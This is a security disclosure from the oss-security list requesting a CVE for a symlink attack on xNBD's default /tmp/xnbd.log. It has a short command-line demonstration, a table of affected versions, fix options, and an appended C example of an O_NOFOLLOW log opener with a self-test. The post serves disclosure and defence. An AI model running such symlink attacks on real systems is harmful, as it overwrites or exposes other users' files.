oss-sec mailing list archives

CVE request: Insecure default log file path in xNBD


From: Sebastian Pipping <sebastian () pipping org>
Date: Wed, 06 Feb 2013 17:48:59 +0100

Hello oss-security!


Target software
===============

xNBD upstream
  https://bitbucket.org/hirofuchi/xnbd

Official Debian packages
  http://packages.debian.org/sid/xnbd-server


Description
===========

xnbd-server (and xnbd-wrapper in some releases) use /tmp/xnbd.log
for logging when parameter --daemonize (and no --logpath FILE) is given.

The file is opened using flags O_WRONLY | O_CREAT | O_APPEND so there
is a vulnerability against symlink attacks.


Demonstration
=============

Here is an exploitation example:

  $ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log

  $ touch DISK
  $ truncate --size=$((100*1024**2)) DISK

  $ /usr/sbin/xnbd-server --daemonize --target DISK
  xnbd-server(12462) msg: daemonize enabled
  xnbd-server(12462) msg: cmd target mode
  xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB)
  xnbd-server(12462) msg: xnbd master initialization done
  xnbd-server(12462) msg: logfile /tmp/xnbd.log

  $ ls -l ~/ATTACK_TARGET
  -rw------- 1 user123 user123 653 Feb  1 16:41 \
    /home/user123/ATTACK_TARGET


Affected versions
=================

The latest code in the upstream Mercurial repository is not affected
since it does not use logging to /tmp/xnbd.log (or any default
location) any more.

----------------------------------------------------------------------
  Version                        Status
----------------------------------------------------------------------
  0.0.x                          not analyzed
  0.1.0-pre                      VULNERABLE (xnbd-server only)
  0.1.0-pre-hg20-e75b93a47722-2  VULNERABLE (xnbd-server and -wrapper)
  Mercurial tip                  not vulnerable
----------------------------------------------------------------------


Options for a fix
=================

 a) Use syslog with --daemonize and no default file location in general
    (i.e. what upstream did)

 b) Use /var/log/xnbd-server.log and /var/log/xnbd-wrapper.log
    for the hard-coded defaults

 c) Replace flag O_APPEND by O_EXCL  (secure but reducing functionality)

The attached patch applies approach (b) to version 0.1.0-pre-hg20-e75b93a47722.


Best,



Sebastian

Attachment: xnbd-0.1.0-pre-hg20-e75b93a47722-insecure-logging-location.patch
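As an added example (not from the post or the xnbd project), the open() call below keeps the O_APPEND behaviour the server needs but adds O_NOFOLLOW, so a planted symlink at the fixed log path fails with ELOOP instead of being written through; this is a variant beside the three options listed above. The function names, the scratch directory and the ATTACK_TARGET/xnbd.log file names are assumptions constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a log file for appending, but refuse to follow a symbolic link in
 * the final path component (O_NOFOLLOW): a planted /tmp/xnbd.log -> victim
 * link then makes open() fail with ELOOP instead of writing into the victim. */
int open_log_nofollow(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    /* Only keep a regular file: rejects devices, FIFOs etc. reached by a race. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        errno = EINVAL;
        return -1;
    }
    return fd;
}

/* Self-contained check of the advisory's scenario in a constructed scratch
 * directory: a symlink named xnbd.log pointing at ATTACK_TARGET must be
 * rejected, while a plain xnbd-server.log must open. Returns 1 on that outcome. */
int demo_symlink_rejected(void)
{
    char dir[] = "/tmp/xnbd-demo-XXXXXX";
    if (mkdtemp(dir) == NULL)
        return 0;
    char target[64], link[64], plain[64];
    snprintf(target, sizeof target, "%s/ATTACK_TARGET", dir);
    snprintf(link, sizeof link, "%s/xnbd.log", dir);
    snprintf(plain, sizeof plain, "%s/xnbd-server.log", dir);
    int ok = 0, t = open(target, O_WRONLY | O_CREAT, 0600);
    if (t >= 0 && close(t) == 0 && symlink(target, link) == 0) {
        int bad = open_log_nofollow(link);    /* expected: -1 with errno ELOOP */
        int bad_errno = errno;
        int good = open_log_nofollow(plain);  /* expected: a valid descriptor */
        ok = (bad < 0 && bad_errno == ELOOP && good >= 0);
        if (good >= 0) close(good);
    }
    unlink(plain); unlink(link); unlink(target); rmdir(dir);
    return ok;
}
```

O_NOFOLLOW only governs the last path component, so it complements rather than replaces moving the default out of /tmp; Linux 3.6 and later additionally refuse to follow symlinks in sticky world-writable directories when fs.protected_symlinks is enabled, but the flag holds regardless of that setting.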